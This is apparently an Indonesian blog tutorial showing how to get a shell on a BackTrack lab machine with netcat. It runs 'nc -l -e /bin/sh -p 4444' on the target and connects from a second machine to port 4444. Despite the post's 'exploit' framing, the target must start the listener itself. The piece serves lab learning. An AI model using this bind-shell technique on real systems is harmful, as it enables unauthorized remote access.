Selamat siang temen-temen. Saat ini saya akan mengeshared bagaimana cara mengexploit Sistem Operasi Backtrack menggunakan NetCut (NC).

Didalam sistem unix tidak hanya backtrack, tersedia paket untuk koneksi menggunkan nc, tlnet, ssh dan lain sebagainya. Kalau kita tidak tau bagaimana cara sistem kerja dari semua tipe koneksi tersebut maka dimungkinkan kita malah membuat lubang pada System kita sendiri. Disini akan saya contohkan bagaimana kita masuk ke komputer Lab yang sama sama menggunakan Sistem Operasi Backtrack.

Alat yang harus disiapkan.

  • LAB yang sudah terinstall Backtrack. (bisa menggunakan seri Backtrack apa saja.. )
  • Terminal (yakuake, atau bisa menggunakan terminal biasa)
  • Sedikit keberuntungan
  • Dan secangkir kopi + rokok bila perlu (hanya bercanda)

Oke sebelum kita melakukan exploitasi kita harus tau dulu apa itu Listener ?

Listen dari bahasa inggris diartikan sebagai kegiatan untuk mendengarkan. Nah kegiatan mendengar ini bisa dijadikan sebagai alat untuk masuk ke komputer orang. Kenapa bisa??
  • NC didalam backtrack adalah program untuk melakukan koneksi ke IP / Host.
  • NC mengijinkan kita untuk masuk karena konsep NC adalah membuka jalur / port ke system untuk dapat menerima koneksi dan mengirim koneksi ke target.

Dari situ kita bisa melihat bahwa  ada celah untuk kita masuk kedalam system tersebut. Sip ga perlu berlama-lama.

Hidupkan Lap dan siapakan terminal.

 
       Komputer Lab                                                 Komputer Me


 Setelah Lab dan Komputer utama siap, kita jalankan terminal yang ada di kedua komputer tersebut.

 
Komputer Lab                                          Komputer Me
Mari kita jelaskan sedikit disini perintah nc didalam Komputer Lab dan Komputer Me
  • Komputer Lab
  • nc -l -e /bin/sh -p 4444
  • -l = membuka perintah untuk listener
  • -e = membuka perintah untuk menjalankan eksekutor saat nc dijalankan.
  • -p = membuka port
  • Komputer Me
  • nc 192.168.56.101 4444
  • 192.168.56.101 = IP target (komputer lab)
  • 4444 = Port yang disediakan / yang di buka oleh target


Hasil


Taraaaaa.... Kita masuk komputer Lab... :)
 

Leave a Reply